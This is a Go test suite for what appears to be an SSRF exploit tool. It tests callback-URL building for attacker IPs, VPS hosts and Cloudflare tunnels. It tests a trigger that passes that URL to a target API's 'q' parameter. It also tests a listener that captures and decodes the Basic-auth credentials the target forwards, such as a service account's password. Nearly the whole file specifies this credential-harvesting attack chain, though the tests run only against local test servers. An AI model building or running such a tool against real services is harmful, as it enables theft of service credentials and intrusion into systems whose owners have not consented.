package main import ( "context" "encoding/base64" "io" "net/http" "net/http/httptest" "strings" "testing" "time" ) // encodeBasic returns a Basic Authorization header value for the given credentials. func encodeBasic(s string) string { return "Basic " + base64.StdEncoding.EncodeToString([]byte(s)) } // -- buildCallbackURL --------------------------------------------------------- func TestBuildCallbackURL(t *testing.T) { tests := []struct { name string host string port string want string }{ { name: "bare IP - port appended", host: "192.168.1.10", port: "9090", want: "http://192.168.1.10:9090" + ssrfPath, }, { name: "bare IP with different port - correct port appended", host: "192.168.1.10", port: "7777", want: "http://192.168.1.10:7777" + ssrfPath, }, { name: "bare hostname - port appended", host: "myhost.local", port: "9090", want: "http://myhost.local:9090" + ssrfPath, }, { name: "http IP no port - port appended", host: "http://192.168.1.10", port: "9090", want: "http://192.168.1.10:9090" + ssrfPath, }, { name: "http IP with explicit port - used as-is", host: "http://192.168.1.10:9090", port: "9090", want: "http://192.168.1.10:9090" + ssrfPath, }, { name: "http IP with different explicit port - listener port ignored", host: "http://192.168.1.10:8888", port: "9090", want: "http://192.168.1.10:8888" + ssrfPath, }, { name: "http IP with explicit port and trailing slash - slash stripped", host: "http://192.168.1.10:8888/", port: "9090", want: "http://192.168.1.10:8888" + ssrfPath, }, { name: "https tunnel hostname - no port appended", host: "https://random-words.trycloudflare.com", port: "9090", want: "https://random-words.trycloudflare.com" + ssrfPath, }, { name: "https tunnel hostname with trailing slash - slash stripped", host: "https://random-words.trycloudflare.com/", port: "9090", want: "https://random-words.trycloudflare.com" + ssrfPath, }, { name: "http IP with trailing slash - slash stripped and port appended", host: "http://192.168.1.10/", port: "9090", want: "http://192.168.1.10:9090" + ssrfPath, }, { name: "http VPS hostname no explicit port - port appended", host: "http://vps.example.com", port: "9090", want: "http://vps.example.com:9090" + ssrfPath, }, { name: "http VPS hostname with explicit port - used as-is", host: "http://vps.example.com:9090", port: "9090", want: "http://vps.example.com:9090" + ssrfPath, }, { name: "http IPv6 no port - brackets preserved and port appended", host: "http://[::1]", port: "9090", want: "http://[::1]:9090" + ssrfPath, }, { name: "bare IPv6 no brackets - brackets added and port appended", host: "::1", port: "9090", want: "http://[::1]:9090" + ssrfPath, }, { name: "bare IPv6 with brackets - brackets preserved and port appended", host: "[::1]", port: "9090", want: "http://[::1]:9090" + ssrfPath, }, { name: "https IP no port - treated as tunnel, no port appended", host: "https://192.168.1.10", port: "9090", want: "https://192.168.1.10" + ssrfPath, }, { name: "http IPv6 with explicit port - used as-is", host: "http://[::1]:9090", port: "9090", want: "http://[::1]:9090" + ssrfPath, }, { name: "https IPv6 no port - treated as tunnel, no port appended", host: "https://[::1]", port: "9090", want: "https://[::1]" + ssrfPath, }, { name: "https IPv6 with explicit port - used as-is", host: "https://[::1]:443", port: "9090", want: "https://[::1]:443" + ssrfPath, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := buildCallbackURL(tt.host, tt.port) if got != tt.want { t.Errorf("buildCallbackURL(%q, %q)\n got %s\n want %s", tt.host, tt.port, got, tt.want) } }) } } // -- decodeAuth --------------------------------------------------------------- func TestDecodeAuth(t *testing.T) { tests := []struct { name string header string want string }{ { name: "empty header", header: "", want: "", }, { name: "valid Basic auth", header: encodeBasic("testuser:testpassword"), want: "testuser:testpassword", }, { name: "colon in password", header: encodeBasic("user:p@ss:w0rd"), want: "user:p@ss:w0rd", }, { name: "non-Basic scheme returned as-is", header: "Bearer some-token", want: "Bearer some-token", }, { name: "invalid base64 returns empty string", header: "Basic !!!not-valid-base64!!!", want: "", }, { name: "Basic with empty payload - decodes to empty string", header: "Basic ", want: "", }, { name: "lowercase basic scheme returned as-is", header: "basic dXNlcjpwYXNz", want: "basic dXNlcjpwYXNz", }, { name: "unpadded base64 - decoded despite missing padding", header: "Basic YWI6Y2Q", // "ab:cd" without trailing = want: "ab:cd", }, { name: "trailing whitespace in payload - still decoded", header: "Basic dXNlcjpwYXNz ", // "user:pass" with trailing space want: "user:pass", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := decodeAuth(tt.header) if got != tt.want { t.Errorf("decodeAuth(%q)\n got %q\n want %q", tt.header, got, tt.want) } }) } } // -- callbackHandler ---------------------------------------------------------- func TestCallbackHandler(t *testing.T) { tests := []struct { name string path string auth string verbose bool body string wantCode int wantCreds string // empty means done should not receive a value prefillDone string // if non-empty, pre-fill done channel before handling }{ { name: "wrong path - 404 and done untouched", path: "/not-the-ssrf-path", wantCode: http.StatusNotFound, }, { name: "wrong path with verbose - headers consumed but 404 and done untouched", path: "/not-the-ssrf-path", verbose: true, body: "some body", wantCode: http.StatusNotFound, }, { name: "correct path with no auth - 200 and done untouched", path: ssrfPath, wantCode: http.StatusOK, }, { name: "correct path with Bearer token - raw header captured", path: ssrfPath, auth: "Bearer some-token", wantCode: http.StatusOK, wantCreds: "Bearer some-token", }, { name: "correct path with invalid base64 - 200 and done untouched", path: ssrfPath, auth: "Basic !!!invalid!!!", wantCode: http.StatusOK, }, { name: "correct path with valid Basic auth - decoded credentials captured", path: ssrfPath, auth: encodeBasic("admin:hunter2"), wantCode: http.StatusOK, wantCreds: "admin:hunter2", }, { name: "verbose mode with body - credentials captured and body printed", path: ssrfPath, auth: encodeBasic("user:pass"), verbose: true, body: "some request body", wantCode: http.StatusOK, wantCreds: "user:pass", }, { name: "verbose mode with no body - body print suppressed", path: ssrfPath, auth: encodeBasic("user:pass"), verbose: true, wantCode: http.StatusOK, wantCreds: "user:pass", }, { name: "duplicate callback - channel full, credentials discarded", path: ssrfPath, auth: encodeBasic("second:creds"), wantCode: http.StatusOK, prefillDone: "first:creds", wantCreds: "first:creds", // channel holds the original, not the duplicate }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { done := make(chan string, 1) if tt.prefillDone != "" { done <- tt.prefillDone } req := httptest.NewRequest("GET", tt.path, strings.NewReader(tt.body)) if tt.auth != "" { req.Header.Set("Authorization", tt.auth) } rr := httptest.NewRecorder() callbackHandler(tt.verbose, done)(rr, req) if rr.Code != tt.wantCode { t.Errorf("status: got %d, want %d", rr.Code, tt.wantCode) } if tt.wantCreds != "" { select { case got := <-done: if got != tt.wantCreds { t.Errorf("creds: got %q, want %q", got, tt.wantCreds) } default: t.Errorf("expected %q in done channel, got nothing", tt.wantCreds) } } else { select { case got := <-done: t.Errorf("done should be empty, got %q", got) default: } } }) } } // -- fireTrigger -------------------------------------------------------------- func TestFireTrigger(t *testing.T) { var gotPath, gotQ string ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { gotPath = r.URL.Path gotQ = r.URL.Query().Get("q") w.WriteHeader(http.StatusOK) })) defer ts.Close() status, err := fireTrigger(ts.URL, "192.168.1.10", "9090") if err != nil { t.Fatalf("unexpected error: %v", err) } if status != http.StatusOK { t.Errorf("status: got %d, want %d", status, http.StatusOK) } if gotPath != apiPath { t.Errorf("path: got %s, want %s", gotPath, apiPath) } wantQ := "http://192.168.1.10:9090" + ssrfPath if gotQ != wantQ { t.Errorf("q param:\n got %s\n want %s", gotQ, wantQ) } } func TestFireTriggerTrailingSlashOnTarget(t *testing.T) { var gotPath, gotQ string ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { gotPath = r.URL.Path gotQ = r.URL.Query().Get("q") w.WriteHeader(http.StatusOK) })) defer ts.Close() _, err := fireTrigger(ts.URL+"/", "192.168.1.10", "9090") if err != nil { t.Fatalf("unexpected error: %v", err) } if gotPath != apiPath { t.Errorf("path: got %s, want %s", gotPath, apiPath) } wantQ := "http://192.168.1.10:9090" + ssrfPath if gotQ != wantQ { t.Errorf("q param:\n got %s\n want %s", gotQ, wantQ) } } func TestFireTriggerNonOKStatus(t *testing.T) { ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusInternalServerError) })) defer ts.Close() status, err := fireTrigger(ts.URL, "192.168.1.10", "9090") if err != nil { t.Fatalf("unexpected error: %v", err) } if status != http.StatusInternalServerError { t.Errorf("status: got %d, want %d", status, http.StatusInternalServerError) } } func TestFireTriggerConnectionRefused(t *testing.T) { _, err := fireTrigger("http://127.0.0.1:1", "192.168.1.10", "9090") if err == nil { t.Error("expected error for connection refused, got nil") } } // -- callback chain (integration) --------------------------------------------- func TestCallbackChain(t *testing.T) { done := make(chan string, 1) ln, server, err := startListener("0", false, done) if err != nil { t.Fatalf("startListener failed: %v", err) } defer server.Shutdown(context.Background()) go func() { if err := server.Serve(ln); err != nil && err != http.ErrServerClosed { t.Errorf("server error: %v", err) } }() creds := "service-account:secret-password" req, err := http.NewRequest("GET", "http://"+ln.Addr().String()+ssrfPath, nil) if err != nil { t.Fatalf("NewRequest: %v", err) } req.Header.Set("Authorization", encodeBasic(creds)) resp, err := http.DefaultClient.Do(req) if err != nil { t.Fatalf("callback request failed: %v", err) } io.Copy(io.Discard, resp.Body) //nolint:errcheck resp.Body.Close() select { case got := <-done: if got != creds { t.Errorf("credentials: got %q, want %q", got, creds) } case <-time.After(2 * time.Second): t.Error("timed out waiting for callback") } } func TestCallbackChainDuplicateDiscarded(t *testing.T) { done := make(chan string, 1) ln, server, err := startListener("0", false, done) if err != nil { t.Fatalf("startListener failed: %v", err) } defer server.Shutdown(context.Background()) go func() { if err := server.Serve(ln); err != nil && err != http.ErrServerClosed { t.Errorf("server error: %v", err) } }() send := func(creds string) { req, err := http.NewRequest("GET", "http://"+ln.Addr().String()+ssrfPath, nil) if err != nil { t.Fatalf("NewRequest: %v", err) } req.Header.Set("Authorization", encodeBasic(creds)) resp, err := http.DefaultClient.Do(req) if err != nil { t.Fatalf("request failed: %v", err) } io.Copy(io.Discard, resp.Body) //nolint:errcheck resp.Body.Close() } send("first:creds") send("second:creds") // should be silently discarded select { case got := <-done: if got != "first:creds" { t.Errorf("expected first:creds, got %q", got) } case <-time.After(2 * time.Second): t.Error("timed out waiting for callback") } // Channel should now be empty - second callback was discarded select { case extra := <-done: t.Errorf("second callback leaked into channel: %q", extra) default: } }